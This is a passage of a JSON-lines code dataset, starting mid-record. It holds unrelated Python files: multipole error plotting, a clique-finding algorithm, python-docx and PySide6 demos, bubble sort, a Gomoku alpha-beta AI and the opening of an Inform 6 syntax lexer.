results[:,:,2].real\nbound = results[:,:,3].real\nVB_rms = np.sqrt(1/VB.size*np.linalg.norm(VB)**2)\nprint(VB_rms)\n\n# Compute error and print results\n# error_exact = np.abs((VB - PhiA_B))\nerror_exact = np.abs((VB - PhiA_B))/VB_rms*100\nerror_rot = np.abs((PhiB - PhiA_B))/VB_rms*100\nbound = bound/VB_rms*100\n\n# print(\"Potential (via M.E.) of System A rot to B evaluated at point 'p' = \",PhiA_B.real)\n# print(\"% Error compared to exact = \",\"{0:.3f}\".format(error_exact.real),'%')\n# print(\"% Error bound = \",\"{0:.3f}\".format(bound),'%')\n# print(\"% Error compared to potential using M.E. 
of 'B' = \",\"{0:.3f}\".format(error_rot.real),'%')\n\n# <codecell>\n\n# Plot the results\n\nplt.close('all')\n\nR = (dist - 0.5)/1.0\n\nlevels = np.linspace(0,20,10)\n\nplt.close('all')\nplt.figure(figsize=(10, 8))\n\nplt.rc('text', usetex=True)\nplt.rc('font', family='serif')\n\n# Plot the error vs. exact\nfig = plt.figure(figsize=(10, 8))\nplt.rc('text', usetex=True)\nplt.rc('font', family='serif')\nlevels = np.linspace(0,20,10)\nCS = plt.contourf(R, theta*180/np.pi, error_exact, levels)\nCB = plt.colorbar(CS, extend='both')\nplt.title('Error vs Exact')\nplt.xlabel(r'$\\frac{R}{L}$')\nplt.ylabel(r'Rotation Angle $\\left(\\theta\\right)$')\nplt.savefig('ErrorExact.pdf')\n# plt.show()\n\n# Plot the error vs. multipole\nfig = plt.figure(figsize=(10, 8))\nplt.rc('text', usetex=True)\nplt.rc('font', family='serif')\nlevels = np.linspace(0,20,10)\nCS = plt.contourf(R, theta*180/np.pi, error_rot, levels)\nCB = plt.colorbar(CS, extend='both')\nplt.title(r'Error vs Multipole')\nplt.xlabel(r'$\\frac{R}{L}$')\nplt.ylabel(r'Rotation Angle $\\left(\\theta\\right)$')\nplt.savefig('ErrorMultipole.pdf')\n# plt.show()\n\n\n# plt.subplot(2, 1, 1)\n# plt.contourf(R, theta*180/np.pi, error_exact, levels)\n# plt.title(r'Percent Error v.s. Exact')\n# plt.ylabel(r'Rotation Angle $\\left(\\theta\\right)')\n\n# plt.subplot(2, 1, 2)\n# plt.contourf(R, theta*180/np.pi, error_rot, levels)\n# plt.title(r'Percent Error v.s. Direct Spatial Multipole')\n# plt.xlabel(r'$\\frac{R}{L}$')\n# plt.ylabel(r'Rotation Angle $\\left(\\theta\\right)')\n\n# plt.savefig('ErrorSubplot.pdf')\n# plt.show()\n\n# # Two subplots, the axes array is 1-d\n# fig, axarr = plt.subplots(2, sharex=True)\n# axarr[0].contourf(R, theta*180/np.pi, error_exact, levels)\n# axarr[0].set_title(r'Percent Error v.s. Exact')\n# axarr[1].contourf(R, theta*180/np.pi, error_rot, levels)\n# axarr[1].set_title(r'Percent Error v.s. Direct')\n\n# # Plot the error bound\n# plt.figure()\n# levels = np.linspace(0,20,10)\n# CS = plt.contourf(R, theta*180/np.pi, bound, levels)\n# # plt.clabel(CS, inline=1, fontsize=10)\n# # make a colorbar for the contour lines\n# CB = plt.colorbar(CS, extend='both')\n# plt.clabel(CS, fontsize=8, inline=1)\n# plt.title('Error Bound')\n# plt.savefig('ErrorBound', dpi=900)\n# plt.show()\n\n# <codecell>\n\n# p = 2\n# dist = 2\n# theta = 0*np.pi/180\n# error = example(theta,dist,p)\n# RL = (dist - 0.5)/0.5\n# print('R/L = ',RL,'theta = ',theta*180/np.pi)\n# print('% Error Compared to Exact = ',error[0])\n# print('% Error Compared to Direct Multipole = ',error[1])\n# print('% Error Bound= ',error[2])\n\n# <codecell>\n\n\n","repo_name":"cdlrpi/fmm-rigidbodies","sub_path":"dipole-rotation/dipole-rotation-v4.py","file_name":"dipole-rotation-v4.py","file_ext":"py","file_size_in_byte":13043,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"22933175217","text":"\"\"\"\nFinds all cliques in an undirected graph. A clique is a set of vertices in the\ngraph such that the subgraph is fully connected (ie. 
for any pair of nodes in\nthe subgraph there is an edge between them).\n\"\"\"\n\ndef find_all_cliques(edges):\n \"\"\"\n takes dict of sets\n each key is a vertex\n value is the set of vertices adjacent to that vertex\n returns list of lists (each sub list is a maximal clique)\n implementation of the basic algorithm described in:\n Bron, Coen; Kerbosch, Joep (1973), \"Algorithm 457: finding all cliques of an undirected graph\",\n \"\"\"\n\n def expand_clique(candidates, nays):\n nonlocal compsub\n if not candidates and not nays:\n nonlocal solutions\n solutions.append(compsub.copy())\n else:\n for selected in candidates.copy():\n candidates.remove(selected)\n candidates_temp = get_connected(selected, candidates)\n nays_temp = get_connected(selected, nays)\n compsub.append(selected)\n expand_clique(candidates_temp, nays_temp)\n nays.add(compsub.pop())\n\n def get_connected(vertex, old_set):\n new_set = set()\n for neighbor in edges[str(vertex)]:\n if neighbor in old_set:\n new_set.add(neighbor)\n return new_set\n\n compsub = []\n solutions = []\n possibles = set(edges.keys())\n expand_clique(possibles, set())\n return solutions\n","repo_name":"keon/algorithms","sub_path":"algorithms/graph/find_all_cliques.py","file_name":"find_all_cliques.py","file_ext":"py","file_size_in_byte":1461,"program_lang":"python","lang":"en","doc_type":"code","stars":23106,"dataset":"github-code","pt":"96"} +{"seq_id":"10592047115","text":"# !/usr/bin/python\r\n# -*- coding:utf-8 -*-\r\n# @author : GaiusPluto\r\n# @time : 2022/3/18 20:12\r\nfrom docx import Document\r\n# Access the section's header\r\ndocument = Document()\r\nsection = document.sections[0]\r\nheader = section.header\r\n\r\n# Add a header\r\nparagraph = header.paragraphs[0]\r\nparagraph.text = \"Title of my document\"\r\nheader.is_linked_to_previous = False\r\n\r\n# Add left/center/right header content\r\nparagraph.text = \"Left Text\\tCenter Text\\tRight Text\"\r\nparagraph.style = document.styles[\"Header\"]\r\n\r\n# Remove the header by relinking to the previous section\r\nheader.is_linked_to_previous = True\r\n\r\ndocument.save(\"test_headerandfooter.docx\")\r\n","repo_name":"Plutoeat/autoDoc","sub_path":"study/docHeaderAndFooter.py","file_name":"docHeaderAndFooter.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"96"} +{"seq_id":"20801815584","text":"\ndef bubbleSort(x):\n length = len(x)-1\n for i in range(length):\n for j in range(length-i):\n if x[j] > x[j+1]:\n x[j], x[j+1] = x[j+1], x[j]\n return x\n\n\ndef bubble_sort(arr):\n for i in range(len(arr)):\n for j in range(len(arr)-i-1):\n if arr[j] > arr[j+1]:\n arr[j], arr[j+1] = arr[j+1], arr[j]\n return arr\n\n\narr = [9, 2, 5, 3, 6, 4, 8, 1, 7]\n\n\nfor front_index in range(0, len(arr) - 1):\n for index in range(front_index + 1, len(arr)):\n if arr[front_index] > arr[index]:\n arr[front_index], arr[index] = arr[index], arr[front_index]\nprint(bubbleSort(arr))\n","repo_name":"Daewony/python-algorithms","sub_path":"LG/정렬/버블정렬.py","file_name":"버블정렬.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"3544607524","text":"def outer_func():\n msg=\"String1\"\n def func1():\n nonlocal msg\n print(\"func1\", msg)\n msg=\"String2\"\n print(\"func1\", msg)\n\n def func2():\n nonlocal msg\n print(\"func2\", msg)\n msg=\"String3\"\n print(\"func2\", msg)\n\n return (func1, func2)\n\nmyfuncs = 
outer_func()\n\nmyfuncs[0]()\nmyfuncs[1]()\n","repo_name":"gshimansky/modin-tests","sub_path":"closure.py","file_name":"closure.py","file_ext":"py","file_size_in_byte":347,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"12458350237","text":"from PySide6.QtWebEngineCore import QWebEngineDownloadRequest\nfrom PySide6.QtWidgets import QWidget, QFileDialog\nfrom PySide6.QtCore import QDir, QFileInfo, Qt\n\nfrom downloadwidget import DownloadWidget\nfrom ui_downloadmanagerwidget import Ui_DownloadManagerWidget\n\n\n# Displays a list of downloads.\nclass DownloadManagerWidget(QWidget):\n\n def __init__(self, parent=None):\n super().__init__(parent)\n self._ui = Ui_DownloadManagerWidget()\n self._num_downloads = 0\n self._ui.setupUi(self)\n\n def download_requested(self, download):\n assert (download and download.state() == QWebEngineDownloadRequest.DownloadRequested)\n\n proposal_dir = download.downloadDirectory()\n proposal_name = download.downloadFileName()\n proposal = QDir(proposal_dir).filePath(proposal_name)\n path, _ = QFileDialog.getSaveFileName(self, \"Save as\", proposal)\n if not path:\n return\n\n fi = QFileInfo(path)\n download.setDownloadDirectory(fi.path())\n download.setDownloadFileName(fi.fileName())\n download.accept()\n self.add(DownloadWidget(download))\n\n self.show()\n\n def add(self, downloadWidget):\n downloadWidget.remove_clicked.connect(self.remove)\n self._ui.m_itemsLayout.insertWidget(0, downloadWidget, 0, Qt.AlignTop)\n if self._num_downloads == 0:\n self._ui.m_zeroItemsLabel.hide()\n self._num_downloads += 1\n\n def remove(self, downloadWidget):\n self._ui.m_itemsLayout.removeWidget(downloadWidget)\n downloadWidget.deleteLater()\n self._num_downloads -= 1\n if self._num_downloads == 0:\n self._ui.m_zeroItemsLabel.show()\n","repo_name":"qtproject/pyside-pyside-setup","sub_path":"examples/webenginewidgets/simplebrowser/downloadmanagerwidget.py","file_name":"downloadmanagerwidget.py","file_ext":"py","file_size_in_byte":1697,"program_lang":"python","lang":"en","doc_type":"code","stars":55,"dataset":"github-code","pt":"96"} +{"seq_id":"74208533754","text":"x = int(input(\"Primeiro número: \"))\ny = int(input(\"Segundo número: \"))\nz = int(input(\"Terceiro número: \"))\nmenor = x\nif y < x and y < z:\n menor = y\nif z < x and z < y:\n menor = z\n\nmaior = x\nif y > x and y > z:\n maior = y\nif z > x and z > y:\n maior = z\nprint (\"O menor número é {}\".format(menor))\nprint (\"O maior número é {}\".format(maior))","repo_name":"HeyCaroll/Python-CeV","sub_path":"exercícios/1°mundo/aula 10 - condições (Parte 1)/EX033.PY","file_name":"EX033.PY","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"17787164965","text":"import math\nimport heapq\nimport random\n\nsize = 15\n\n\ndef initial_board():\n board = {}\n for i in range(1,size+1):\n board[i] = {}\n for j in range(1,size+1):\n board[i][j] = 0\n return board\n\n\nclass State:\n \"\"\"Define state of gomoku game.\"\"\"\n\n def __init__(self, action, pre_state, action_player=2, next_player=1, has_color=True):\n \"\"\"Initialization for creating a state.\n AI is player 1 (MAX) and human player is player 2 (MIN).\n self.player is the player who is going to make next move.\n \"\"\"\n\n self.action = action\n # Initial state\n if pre_state is None:\n self.action_player = action_player\n self.player = next_player\n self.available_moves = set()\n for x in range(1, 16):\n 
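# every square except the opening move starts out as an available move\n 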
for y in range(1, 16):\n if (x, y) != action:\n self.available_moves.add((x, y))\n self.occupied = {}\n if next_player == 1:\n self.occupied[action] = 2\n else:\n self.occupied[action] = 1\n self.top = action[0]\n self.bottom = action[0]\n self.left = action[1]\n self.right = action[1]\n global use_color\n use_color = has_color\n else:\n self.action_player = pre_state.player\n if pre_state.player == 1:\n self.player = 2\n else:\n self.player = 1\n self.available_moves = set(pre_state.available_moves)\n self.available_moves.remove(action)\n self.occupied = dict(pre_state.occupied)\n self.occupied[action] = pre_state.player\n # Set the most top, bottom, left, and right index for the state.\n if action[0] < pre_state.top:\n self.top = action[0]\n else:\n self.top = pre_state.top\n if action[0] > pre_state.bottom:\n self.bottom = action[0]\n else:\n self.bottom = pre_state.bottom\n if action[1] < pre_state.left:\n self.left = action[1]\n else:\n self.left = pre_state.left\n if action[1] > pre_state.right:\n self.right = action[1]\n else:\n self.right = pre_state.right\n self.pre_state = pre_state\n if self.action_player == 1:\n self.value = evaluate_state(self)\n else:\n self.value = -evaluate_state(self)\n\n def successors(self):\n \"\"\"Get successor states.\"\"\"\n\n if self.player == 1: # MAX HEAP\n children = []\n for (x, y) in self.available_moves:\n if (y >= self.left - 3) and (y <= self.right + 3) and (x >= self.top - 3) and (x <= self.bottom + 3):\n child = State((x, y), self)\n heap_key = -child.value-random.random()\n heapq.heappush(children, (heap_key, child))\n return children\n else: # MIN HEAP:\n children = []\n for (x, y) in self.available_moves:\n if (y >= self.left - 3) and (y <= self.right + 3) and (x >= self.top - 3) and (x <= self.bottom + 3):\n child = State((x, y), self)\n heap_key = child.value - random.random()\n heapq.heappush(children, (heap_key, child))\n return children\n\n def populate_states(self, list, player):\n \"\"\"Used for testing to generate a state.\"\"\"\n if self.pre_state is None:\n for action in list:\n self.occupied[action] = player\n self.available_moves.remove(action)\n return 1\n print(\"you can only populate at the init state\")\n return 0\n\n def __str__(self):\n \"\"\"Print the board of current state.\"\"\"\n s = \" 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15\\n\"\n board = initial_board()\n count = 1\n for i in self.occupied:\n board[i[0]][i[1]] = self.occupied[i]\n space = ''\n for i in range(0, 16):\n space += ' '\n start = '---'.join(space)\n s += start+'\\n|'\n for row in range(1,16):\n for col in range(1,16):\n if use_color and (row, col) == self.action:\n s += '\\033[91m'\n if board[row][col] == 0:\n s += ' |'\n elif board[row][col] == 1:\n s += ' O |'\n else:\n s += ' X |'\n if use_color and (row, col) == self.action:\n s += '\\033[0m'\n s += '\\033[0m'\n s+=str(count)+'\\n'+start+'\\n|'\n count += 1\n\n s = s[:len(s)-1]\n s += \"\\n*****************************************************************************\"\n return s[:len(s)-1]\n\n\nclass SearchEngine:\n \"\"\" The search method to determine next step. 
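It runs a depth-limited alpha-beta search and returns the best action found. 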
\"\"\"\n\n def next_move(self, cur_state):\n \"\"\"Given the current state, return the best movement to next state.\n AI is always player 1, so we only need to calculate for MAX.\n \"\"\"\n\n alpha, final_state, min_level, action_took = self.alpha_beta(cur_state, 2, 0, -math.inf, math.inf, math.inf)\n #print(\"-----------------------------------------\")\n #print(\"value = \"+str(alpha)+\", min_level = \"+str(min_level))\n #print(\"previous: top=\"+str(cur_state.top)+\", bottom=\"+str(cur_state.bottom)+\", left=\"+str(cur_state.left)+\", right=\"+str(cur_state.right))\n #print(final_state.pre_state)\n return action_took\n\n def alpha_beta(self, cur_state, limit, cur_level, alpha, beta, min_level):\n \"\"\"Alpha-beta pruning with limited depth. Leaves are evaluated by evaluation function.\"\"\"\n\n # Evaluate current state.\n if cur_level == limit or get_action_score(cur_state.action[0], cur_state.action[1], cur_state.action_player, cur_state.occupied)==100:\n return cur_state.value, cur_state, cur_level, None\n else:\n child_list = cur_state.successors()\n final_state = None\n action_took = None\n if cur_state.player == 1: # MAX player\n for i in range(len(child_list)):\n c = heapq.heappop(child_list)\n (c_alpha, c_state, c_level, action) = self.alpha_beta(c[1], limit, cur_level + 1, alpha, beta, min_level)\n # print(\"HERE: \"+str(c_alpha)+\" \"+str(c_level))\n if (c_alpha > alpha) or (c_alpha == alpha and c_level < min_level):\n alpha = c_alpha\n final_state = c_state\n action_took = c[1].action\n min_level = c_level\n if beta <= alpha:\n break\n return alpha, final_state, min_level, action_took\n else: # MIN player\n for i in range(len(child_list)):\n c = heapq.heappop(child_list)\n (c_beta, c_state, c_level, action) = self.alpha_beta(c[1], limit, cur_level + 1, alpha, beta, min_level)\n # print(\"c_beta = \" + str(c_beta) + \", beta = \" + str(beta))\n if (c_beta < beta) or (c_beta == beta and c_level < min_level):\n beta = c_beta\n final_state = c_state\n action_took = c[1].action\n min_level = c_level\n if beta <= alpha:\n break\n return beta, final_state, min_level, action_took\n\n\ndef get_winner(state):\n \"\"\"If there is a winner for state, return the winner. Else if it's terminal state and no player won,\n return 0. 
Else return -1.\"\"\"\n state_val = get_action_score(state.action[0], state.action[1], state.action_player, state.occupied)\n if state_val == 100:\n return state.action_player\n elif len(state.available_moves) == 0:\n return 0\n else:\n return -1\n\n\ndef evaluate_state(state):\n \"\"\"Input a state, return the value of the state.\"\"\"\n\n my_score = get_action_score(state.action[0], state.action[1], state.action_player, state.occupied)\n other_score = get_action_score(state.action[0], state.action[1], state.player, state.occupied)\n \n return max(my_score, other_score)\n\n\ndef get_action_score(x, y, player, occupied):\n \"\"\"Score the line patterns running through (x, y) for the given player.\"\"\"\n\n vertical_num = 1\n horizontal_num = 1\n diagonal_num = 1\n antidiagonal_num = 1\n\n dictionary = {}\n\n # Calculate the number of pieces in a roll on a vertical line, and how many sides are blocked.\n vertical_blocked_1 = 0\n vertical_blocked_2 = 0\n for i in range(1, min(5, x)):\n if (x - i, y) in occupied:\n if occupied[(x - i, y)] == player:\n vertical_num += 1\n if x - i ==1:\n vertical_blocked_1 =1\n else:\n vertical_blocked_1 = 1\n break\n else:\n break\n if x == 1:\n vertical_blocked_1 = 1 \n\n for i in range(1, min(5, size - x + 1)):\n if (x + i, y) in occupied:\n \n if occupied[(x + i, y)] == player:\n vertical_num += 1\n if x + i==15:\n vertical_blocked_2 = 1 \n else:\n vertical_blocked_2 = 1\n break\n else:\n break\n if x == 15:\n vertical_blocked_2 = 1 \n\n if (vertical_num, vertical_blocked_1 + vertical_blocked_2) in dictionary:\n dictionary[(vertical_num, vertical_blocked_1 + vertical_blocked_2)] += 1\n else:\n dictionary[(vertical_num, vertical_blocked_1 + vertical_blocked_2)] = 1\n\n # Calculate the number of pieces in a roll on a horizontal line, and how many sides are blocked.\n horizontal_blocked_1 = 0\n horizontal_blocked_2 = 0\n for i in range(1, min(5, y)):\n if (x, y - i) in occupied:\n if occupied[(x, y - i)] == player:\n horizontal_num += 1\n if y - i == 1:\n horizontal_blocked_1 = 1\n else:\n horizontal_blocked_1 = 1\n break\n else:\n break\n if y == 1:\n horizontal_blocked_1 = 1 \n for i in range(1, min(5, size - y + 1)):\n if (x, y + i) in occupied:\n if occupied[(x, y + i)] == player:\n horizontal_num += 1\n if y + i == 15:\n horizontal_blocked_2 = 1\n else:\n horizontal_blocked_2 = 1\n break\n else:\n break\n if y == 15:\n horizontal_blocked_2 = 1\n\n if (horizontal_num, horizontal_blocked_1 + horizontal_blocked_2) in dictionary:\n dictionary[(horizontal_num, horizontal_blocked_1 + horizontal_blocked_2)] += 1\n else:\n dictionary[(horizontal_num, horizontal_blocked_1 + horizontal_blocked_2)] = 1\n\n # Calculate the number of pieces in a roll through the diagonal, and how many sides are blocked.\n diagonal_blocked_1 = 0\n diagonal_blocked_2 = 0\n for i in range(1, min(5, x, y)):\n if (x - i, y - i) in occupied:\n if occupied[(x - i, y - i)] == player:\n diagonal_num += 1\n if x - i==1 or y-i==1:\n diagonal_blocked_1 = 1\n else:\n diagonal_blocked_1 = 1\n break\n else:\n break\n if x == 1 or y == 1:\n diagonal_blocked_1 = 1\n\n \n for i in range(1, min(5, size - x + 1, size - y + 1)):\n if (x + i, y + i) in occupied:\n if occupied[(x + i, y + i)] == player:\n diagonal_num += 1\n if x + i == 15 or y + i==15:\n diagonal_blocked_2 = 1\n else:\n diagonal_blocked_2 = 1\n break\n else:\n break\n if x == 15 or y == 15:\n diagonal_blocked_2 = 1 \n\n if (diagonal_num, diagonal_blocked_1 + diagonal_blocked_2) in dictionary:\n dictionary[(diagonal_num, diagonal_blocked_1 + diagonal_blocked_2)] 
+= 1\n else:\n dictionary[(diagonal_num, diagonal_blocked_1 + diagonal_blocked_2)] = 1\n\n # Calculate the number of pieces in a roll through the antidiagonal, and how many sides are blocked.\n antidiagonal_blocked_1 = 0\n antidiagonal_blocked_2 = 0\n for i in range(1, min(5, size - x + 1, y)):\n if (x + i, y - i) in occupied:\n if occupied[(x + i, y - i)] == player:\n antidiagonal_num += 1\n if x + i==15 or y - i==1:\n antidiagonal_blocked_1 = 1\n else:\n antidiagonal_blocked_1 = 1\n break\n else:\n break\n if x == 15 or y == 1:\n antidiagonal_blocked_1 = 1 \n\n for i in range(1, min(5, x, size - y + 1)):\n if (x - i, y + i) in occupied:\n if occupied[(x - i, y + i)] == player:\n antidiagonal_num += 1\n if x - i==1 or y + i==15:\n antidiagonal_blocked_2 = 1\n else:\n antidiagonal_blocked_2 = 1\n break\n else:\n break\n if x == 1 or y == 15:\n antidiagonal_blocked_2 = 1 \n\n if (antidiagonal_num, antidiagonal_blocked_1 + antidiagonal_blocked_2) in dictionary:\n dictionary[(antidiagonal_num, antidiagonal_blocked_1 + antidiagonal_blocked_2)] += 1\n else:\n dictionary[(antidiagonal_num, antidiagonal_blocked_1 + antidiagonal_blocked_2)] = 1\n\n # Return the score\n if ((5, 0) in dictionary) or ((5, 1) in dictionary) or ((5, 2) in dictionary):\n return 100\n elif ((4, 0) in dictionary) or ((4, 1) in dictionary and dictionary[(4, 1)] > 1) or (\n (4, 1) in dictionary and (3, 0) in dictionary):\n return 90\n elif (4, 1) in dictionary:\n return 80\n elif ((3, 0) in dictionary) and (dictionary[(3, 0)] > 1):\n return 70\n elif ((3, 0) in dictionary) and ((3, 1) in dictionary):\n return 60\n elif (3, 0) in dictionary:\n return 50\n elif ((2, 0) in dictionary) and (dictionary[(2, 0)] > 1):\n return 40\n elif (3, 1) in dictionary:\n return 30\n elif (2, 0) in dictionary:\n return 20\n elif (2, 1) in dictionary:\n return 10\n else:\n return 0","repo_name":"nishikiw/Gomoku","sub_path":"gomoku.py","file_name":"gomoku.py","file_ext":"py","file_size_in_byte":14564,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"33807064483","text":"ogrenciler = {}\n\n\ndef menu():\n secenek = input(\"\"\"\n 1-Öğrenci ekle\n 2-Öğrenci sil\n 3-Öğrenci görüntüle\n 4-Öğrencileri toplu şekilde sil\n 5-Çıkış\n \"\"\")\n return secenek\n\n\ndef main():\n while True:\n try:\n secenek = int(menu())\n except ValueError:\n print(\"Lütfen sayı giriniz.\")\n else:\n if secenek == 1:\n ogrenci_ekle()\n elif secenek == 2:\n ogrenci_sil()\n elif secenek == 3:\n ogrenci_goruntule()\n elif secenek == 4:\n ogrenci_reset()\n elif secenek == 5:\n break\n else:\n print(\"bilinmeyen bir komut girdiniz\")\n\n\ndef ogrenci_ekle():\n\n tmp_sayac=0\n while True:\n ogr_no = input(\"Ogrencinin numarasini giriniz.\")\n tmp_sayac += 1\n if tmp_sayac == 4:\n print(\"Deneme hakkınızı doldurdunuz.\")\n break\n if len(ogr_no) != 9:\n print(\"Ogrenci numarasi 9 haneli olmalidir\")\n continue\n ogr_vize = input(\"Vize notunu giriniz\")\n ogr_final = input(\"Final notunu giriniz\")\n ogrenciler.update({ogr_no: {'vize': ogr_vize,\n 'final': ogr_final}\n })\n break\n\n\ndef ogrenci_sil():\n silinecek_ogr_no = input(\"lütfen silinecek ogr no giriniz\")\n if silinecek_ogr_no in ogrenciler.keys():\n ogrenciler.pop(silinecek_ogr_no)\n print(\"{} numaralı öğrenci silinmiştir.\".format(silinecek_ogr_no))\n else:\n print(\"{} numaralı öğrenci bulunamadı\".format(silinecek_ogr_no))\n\n\ndef ogrenci_goruntule():\n for ogr_no, ogr_notlari in 
ogrenciler.items():\n print(\"\"\"ogrenci no: {}\n ogrenci vize: {}\n ogrenci final: {}\"\"\".format(ogr_no,\n ogr_notlari.get('vize'),\n ogr_notlari.get('final')))\n if len(ogrenciler.keys()) == 0:\n print(\"Listede öğrenci bulunmuyor\")\n\n\ndef ogrenci_reset():\n ogrenciler.clear()\n print(\"öğrenci listesi basarıyla temizlendi\")\n\n\nmain()","repo_name":"burhanndem/LYKampi","sub_path":"LYKampi/before_2407/funct_vizefinal.py","file_name":"funct_vizefinal.py","file_ext":"py","file_size_in_byte":2186,"program_lang":"python","lang":"tr","doc_type":"code","stars":1,"dataset":"github-code","pt":"96"} +{"seq_id":"32587103806","text":"import matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\n\nfrom collections import Counter\n\n\nmpl.style.use(\"seaborn\")\n\n\ndef qp(x, Q, b):\n return (0.5 * x.T @ Q @ x) + (b.T @ x)\n\n\ndef count_close(samples, obj_fn, gnd_truth, obj_params):\n num_samples = samples.shape[0]\n count = 0\n\n for sample_idx in range(num_samples):\n x = np.transpose(samples[sample_idx, :])\n\n obj = obj_fn(x, *obj_params)\n\n if np.isclose(obj, gnd_truth, atol=1e-2):\n count += 1\n\n return count\n\nDATA_DIR_QP = \"/Users/ethan/LocalResearchData/HamiltonianDescent/QHD_DATA/QP\"\n\n\nDIMS = [50, 60, 75]\nDURTNS = [\"1e2\", \"2e2\", \"3e2\", \"4e2\", \"5e2\", \"6e2\", \"7e2\", \"8e2\", \"9e2\", \"1e3\"]\nNUM_EXPS = 50\n\ndata = {}\n\nfor dim in DIMS:\n print(dim)\n data[dim] = {}\n\n data[dim][\"embedded-timed-processed\"] = {}\n for timing in DURTNS:\n data[dim][\"embedded-timed-processed\"][timing] = []\n\n data[dim][\"quantum-processed\"] = []\n\n for i in range(NUM_EXPS):\n print(f\"instance {i}\")\n inst_data_dir = DATA_DIR_QP + f\"/QP-{dim}d-5s/instance_{i}/\"\n\n # Load QP\n source = inst_data_dir + f\"instance_{i}.npy\"\n\n with open(source, \"rb\") as f:\n Q = np.load(f)\n b = np.load(f)\n Q_c = np.load(f)\n b_c = np.load(f)\n\n qp_params = [Q, b]\n\n\n # Get quadratic program optimum from Gurobi\n fopt = inst_data_dir + f\"instance_{i}_gurobi.npy\"\n\n x_opt = np.load(fopt)\n qp_optimal_obj = qp(x_opt, Q, b)\n\n\n # Compare processed timed classical embedded model samples to QP optimum\n for dur in DURTNS:\n fsamples = inst_data_dir + f\"post_timed_{dur}_sweeps_advantage6_classicaldwave_embedded_qhd_rez8_sample_{i}.npy\"\n\n samples = np.load(fsamples)\n count = count_close(samples, qp, qp_optimal_obj, qp_params)\n data[dim][\"embedded-timed-processed\"][dur].append(count / samples.shape[0])\n\n # Compare processed DWave samples to QP optimum\n fsamples = inst_data_dir + f\"post_advantage6_qhd_rez8_sample_{i}.npy\"\n\n samples = np.load(fsamples)\n count = count_close(samples, qp, qp_optimal_obj, qp_params)\n data[dim][\"quantum-processed\"].append(count / samples.shape[0])\n print()\n\n\nmedians = {}\nerrs = {}\n\nfor dim in DIMS:\n df = pd.DataFrame.from_dict(data[dim][\"embedded-timed-processed\"])\n\n medians[dim] = []\n errs[dim] = np.ndarray((2, len(DURTNS)))\n\n for col_idx in range(len(df.columns)):\n col = df.columns[col_idx]\n medians[dim].append(np.median(df[col]))\n errs[dim][:, col_idx] = np.abs(np.quantile(df[col], [0.25, 0.75]).T - medians[dim][-1])\n\n\ncmap = sns.color_palette(\"colorblind\")\n\nf, ax = plt.subplots(figsize=(90/25.4, 50/25.4), dpi=300)\n\n\nfor dim_idx in range(len(DIMS)):\n dim = DIMS[dim_idx]\n color = cmap[dim_idx]\n paired_color = tuple([(channel + 0.5*(1-channel)) for channel in color])\n plt.axhline(np.median(data[dim][\"quantum-processed\"]), color=paired_color, 
label=f\"DW d{dim}\", linestyle=\"--\", linewidth=1.5)\n\n plt.plot(np.arange(len(medians[dim])),\n medians[dim],\n label=f\"Rotor d{dim}\",\n color=cmap[dim_idx],\n linewidth=1.5,\n marker=\"o\", markersize=4)\n\n\n# plt.title(f\"Median Success Probability vs Dimension\")\nplt.xlabel(\"Classical Time Limit (sweeps)\", size=6)\nplt.ylabel(\"Median Success Probability\", size=6)\nplt.ylim([0, 0.15])\n\n\nplt.xticks(range(len(DURTNS)), DURTNS, size=6)\nplt.yticks(size=5)\n\nplt.legend(frameon=True, facecolor=\"white\", borderpad=0.35, prop={'size': 5})\nplt.savefig(\"./figures/DWClassicalMedians.png\", bbox_inches='tight')\nplt.savefig(\"./figures/DWClassicalMedians.eps\", bbox_inches='tight')\nplt.show()\n","repo_name":"jiaqileng/quantum-hamiltonian-descent","sub_path":"plot/fig4_legacy/fig4medians.py","file_name":"fig4medians.py","file_ext":"py","file_size_in_byte":3787,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"96"} +{"seq_id":"20497154312","text":"\"\"\"\nInform 6 syntax highlighting.\n\nThis is an ultra-minimal version compared to the standard Pygments Inform6\nlexer, but is much more forgiving of syntax errors. And it handles the\nexclamation-inside-string case properly.\n\"\"\"\n\nfrom pygments.lexer import RegexLexer\nfrom pygments.token import (Text, Comment, Operator, Keyword, Name,\n String, Number, Punctuation, Token)\n\nobjects = [\"Class\", \"Nearby\", \"Object\"]\n\ndirectives = [\"Abbreviate\", \"Array\", \"Attribute\", \"Btrace\", \"Class\",\n \"Constant\", \"Default\", \"Dictionary\", \"End\", \"Endif\", \"Etrace\",\n \"Extend\", \"Fake_action\", \"Global\", \"Ifdef\", \"Iffalse\",\n \"Ifndef\", \"Ifnot\", \"Iftrue\", \"Ifv3\", \"Ifv5\", \"Import\",\n \"Include\", \"Link\", \"Listsymbols\", \"Listdict\", \"Listverbs\",\n \"Lowstring\", \"Ltrace\", \"Message\", \"Nearby\", \"Nobtrace\",\n \"Noetrace\", \"Noltrace\", \"Notrace\", \"Object\", \"Property\",\n \"Release\", \"Replace\", \"Serial\", \"Statusline\", \"Stub\",\n \"Switches\", \"System_file\", \"Trace\", \"Verb\", \"Version\",\n \"Zcharacter\"]\n\ndefining = [\"[\", \"array\", \"attribute\", \"class\", \"constant\", \"fake_action\",\n \"global\", \"lowstring\", \"nearby\", \"object\", \"property\"]\n\nattributes = [\"absent\", \"animate\", \"clothing\", \"concealed\", \"container\",\n \"door\", \"edible\", \"enterable\", \"female\", \"general\", \"light\",\n \"lockable\", \"locked\", \"male\", \"moved\", \"neuter\", \"on\", \"open\",\n \"openable\", \"pluralname\", \"proper\", \"scenery\", \"scored\",\n \"static\", \"supporter\", \"switchable\", \"talkable\", \"transparent\",\n \"visited\", \"workflag\", \"worn\"]\n\nproperties = [\"n_to\", 